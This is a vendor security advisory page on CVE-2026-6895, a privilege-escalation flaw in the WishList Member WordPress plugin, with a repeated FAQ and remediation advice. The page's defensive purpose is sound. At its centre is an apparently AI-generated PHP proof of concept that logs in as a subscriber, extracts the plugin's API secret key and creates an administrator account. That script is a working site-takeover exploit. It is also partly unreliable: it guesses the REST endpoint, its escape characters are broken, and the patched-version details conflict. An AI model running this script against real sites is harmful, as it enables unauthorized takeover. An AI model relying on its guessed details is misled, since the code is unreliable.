What is CVE-2026-6895?

CVE-2026-6895 is a high severity vulnerability in the WishList Member plugin for WordPress, affecting versions up to and including 3.30.1. It allows authenticated users to access sensitive information, specifically the REST API secret key, leading to privilege escalation and potential site takeover.

How does CVE-2026-6895 work?

The vulnerability arises from a missing authorization check in the ‘export_settings’ function, which is triggered by the ‘wlm3_export_settings’ AJAX action. An attacker with subscriber-level access can exploit this by sending a POST request to retrieve the API secret key, which can then be used to create an administrator account.

Who is affected by this vulnerability?

Any WordPress site using the WishList Member plugin version 3.30.1 or earlier is at risk. This includes sites where authenticated users have at least subscriber-level access, as they can exploit the vulnerability.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the WishList Member plugin installed. If it is version 3.30.1 or earlier, your site is susceptible to CVE-2026-6895. Additionally, you can review access logs for unauthorized API requests.

What is the CVSS score and what does it mean?

CVE-2026-6895 has a CVSS score of 8.8, indicating a high severity vulnerability. This score reflects the potential impact of the vulnerability, suggesting that it can lead to significant security breaches if exploited.

What steps should I take to fix this vulnerability?

To remediate CVE-2026-6895, update the WishList Member plugin to version 3.31.0 or later, which includes the necessary security patches. Additionally, review your site’s user roles and permissions to ensure proper access controls are in place.

What are the practical risks associated with this vulnerability?

The practical risks include unauthorized access to your WordPress site, allowing attackers to create administrator accounts, install malicious plugins, or exfiltrate sensitive user data. This could lead to complete site compromise and loss of control.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can log in as a subscriber, send a request to the vulnerable AJAX action, and retrieve the API secret key. It further shows how this key can be used to escalate privileges and create an admin user account.

What is the recommended user capability check to implement?

The recommended user capability check to implement in the ‘export_settings’ function is a call to current_user_can() with a capability such as ‘manage_options’. This ensures that only users with appropriate permissions can access sensitive settings.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider temporarily disabling the WishList Member plugin until a secure version can be installed. Additionally, review user roles and limit access to authenticated users who do not require subscriber-level permissions.

How can I protect my site from future vulnerabilities?

To enhance your site’s security, regularly update all plugins and themes, implement strong user role management, and conduct periodic security audits. Consider using security plugins that monitor for vulnerabilities and unauthorized access.

Where can I find more information about CVE-2026-6895?

More information about CVE-2026-6895 can be found in the official CVE database and security advisory posts from reputable WordPress security resources. Keeping abreast of security news and updates is crucial for maintaining site security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 22, 2026

CVE-2026-6895: Wishlist Member <= 3.30.1 – Missing Authorization to Authenticated (Subscriber+) API Secret Key Disclosure and Privilege Escalation via 'wlm3_export_settings' AJAX Action (wishlist-member-x)

CVE ID CVE-2026-6895

Plugin wishlist-member-x

Severity High (CVSS 8.8)

CWE 269

Vulnerable Version 3.30.1

Patched Version —

Disclosed May 21, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6895 (metadata-based): This vulnerability affects the WishList Member plugin for WordPress (versions 3.30.1 and earlier). It exposes the REST API secret key to authenticated users with minimal privileges, enabling privilege escalation and complete site takeover. The CVSS score is 8.8 (High) with a network attack vector and low complexity.

The root cause is a missing capability check in the ‘export_settings’ function called via the ‘wlm3_export_settings’ AJAX action. The CWE classification of Improper Privilege Management (269) confirms the plugin fails to verify that the requesting user has sufficient permissions (e.g., admin-level) before returning sensitive configuration data. Atomic Edge analysis infers this missing check likely occurs because the developer either omitted a current_user_can() call or used a nonce-only check without a capability verification. The absence of code diffs prevents confirmation, but the description explicitly states the AJAX action returns the API secret key to any authenticated user.

An attacker with a subscriber-level account or higher can exploit this by sending a POST request to /wp-admin/admin-ajax.php with the action parameter set to ‘wlm3_export_settings’. The vulnerable function returns a JSON response containing the REST API secret key. The attacker then uses this key to authenticate requests to the WishList Member REST API, create a new membership level with the administrator WordPress role assigned, and register a new administrator user account. This results in full control over the WordPress installation.

Remediation requires implementing proper authorization checks in the ‘export_settings’ function. The fix must include a call to current_user_can() or a similar capability validation (e.g., ‘manage_options’) before processing the AJAX request. Plugin version 3.31.0 is reported as patched.

The impact is severe: complete site compromise. An unprivileged user can read the API secret key, escalate privileges to administrator, and take over the site. This enables installing malicious plugins, defacing content, exfiltrating user data, or using the server for further attacks. No authentication bypass is required, only existing subscriber credentials.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6895 - Wishlist Member <= 3.30.1 - Missing Authorization to Authenticated (Subscriber+) API Secret Key Disclosure and Privilege Escalation via 'wlm3_export_settings' AJAX Action

// NOTE: This PoC demonstrates disclosure of the API secret key, then uses it to create an admin user via the WishList Member API.
// ASSUMPTIONS:
// 1. The WishList Member plugin is active and vulnerable.
// 2. Attacker has valid subscriber credentials (username/password).
// 3. The REST API endpoint follows typical WishList Member patterns (no code diff available).

$target_url = 'https://example.com'; // Change this to the target WordPress URL
$subscriber_user = 'attacker';
$subscriber_pass = 'attackerpass';

// Step 1: Login as subscriber and get WordPress cookies
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $subscriber_user,
    'pwd' => $subscriber_pass,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Trigger the vulnerable AJAX action to get the API secret key
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ajax_data = array(
    'action' => 'wlm3_export_settings'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($ajax_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$ajax_response = curl_exec($ch);
curl_close($ch);

echo "[+] AJAX Response:n";
echo $ajax_response . "nn";

// Parse JSON to extract secret key (assuming response structure from plugin)
$json = json_decode($ajax_response, true);
if (isset($json['api_secret_key'])) {
    $api_key = $json['api_secret_key'];
    echo "[+] API Secret Key: $api_keyn";
} elseif (isset($json['secret'])) {
    $api_key = $json['secret'];
    echo "[+] API Secret Key: $api_keyn";
} else {
    echo "[!] Could not extract API key. Check the raw response for key name.n";
    exit;
}

// Step 3: Use the API key to create a new admin user via WishList Member REST API
// NOTE: The exact endpoint and payload structure is inferred from plugin conventions; adjust if needed.
$api_endpoint = $target_url . '/wp-json/wishlist-member/v1/users';
$user_data = array(
    'username' => 'admin_takeover_' . time(),
    'password' => 'P@ssw0rd_' . time(),
    'email' => 'takeover_' . time() . '@example.com',
    'role' => 'administrator',
    'membership_level' => 'default' // Arbitrary level; the API key allows creating new levels as needed
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $api_endpoint);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($user_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'Authorization: Bearer ' . $api_key
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$api_response = curl_exec($ch);
curl_close($ch);

echo "[+] REST API Response:n";
echo $api_response . "nn";

// Clean up cookie file
unlink('/tmp/cookies.txt');
?>

Frequently Asked Questions

What is CVE-2026-6895?
Overview of the vulnerability
CVE-2026-6895 is a high severity vulnerability in the WishList Member plugin for WordPress, affecting versions up to and including 3.30.1. It allows authenticated users to access sensitive information, specifically the REST API secret key, leading to privilege escalation and potential site takeover.
How does CVE-2026-6895 work?
Mechanism of exploitation
The vulnerability arises from a missing authorization check in the ‘export_settings’ function, which is triggered by the ‘wlm3_export_settings’ AJAX action. An attacker with subscriber-level access can exploit this by sending a POST request to retrieve the API secret key, which can then be used to create an administrator account.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the WishList Member plugin version 3.30.1 or earlier is at risk. This includes sites where authenticated users have at least subscriber-level access, as they can exploit the vulnerability.
How can I check if my site is vulnerable?
Verification steps
To determine if your site is vulnerable, check the version of the WishList Member plugin installed. If it is version 3.30.1 or earlier, your site is susceptible to CVE-2026-6895. Additionally, you can review access logs for unauthorized API requests.
What is the CVSS score and what does it mean?
Understanding severity ratings
CVE-2026-6895 has a CVSS score of 8.8, indicating a high severity vulnerability. This score reflects the potential impact of the vulnerability, suggesting that it can lead to significant security breaches if exploited.
What steps should I take to fix this vulnerability?
Recommended remediation actions
To remediate CVE-2026-6895, update the WishList Member plugin to version 3.31.0 or later, which includes the necessary security patches. Additionally, review your site’s user roles and permissions to ensure proper access controls are in place.
What are the practical risks associated with this vulnerability?
Potential consequences of exploitation
The practical risks include unauthorized access to your WordPress site, allowing attackers to create administrator accounts, install malicious plugins, or exfiltrate sensitive user data. This could lead to complete site compromise and loss of control.
How does the proof of concept demonstrate the vulnerability?
Understanding the PoC code
The proof of concept illustrates how an attacker can log in as a subscriber, send a request to the vulnerable AJAX action, and retrieve the API secret key. It further shows how this key can be used to escalate privileges and create an admin user account.
What is the recommended user capability check to implement?
Ensuring proper authorization
The recommended user capability check to implement in the ‘export_settings’ function is a call to current_user_can() with a capability such as ‘manage_options’. This ensures that only users with appropriate permissions can access sensitive settings.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider temporarily disabling the WishList Member plugin until a secure version can be installed. Additionally, review user roles and limit access to authenticated users who do not require subscriber-level permissions.
How can I protect my site from future vulnerabilities?
Best practices for WordPress security
To enhance your site’s security, regularly update all plugins and themes, implement strong user role management, and conduct periodic security audits. Consider using security plugins that monitor for vulnerabilities and unauthorized access.
Where can I find more information about CVE-2026-6895?
Additional resources
More information about CVE-2026-6895 can be found in the official CVE database and security advisory posts from reputable WordPress security resources. Keeping abreast of security news and updates is crucial for maintaining site security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations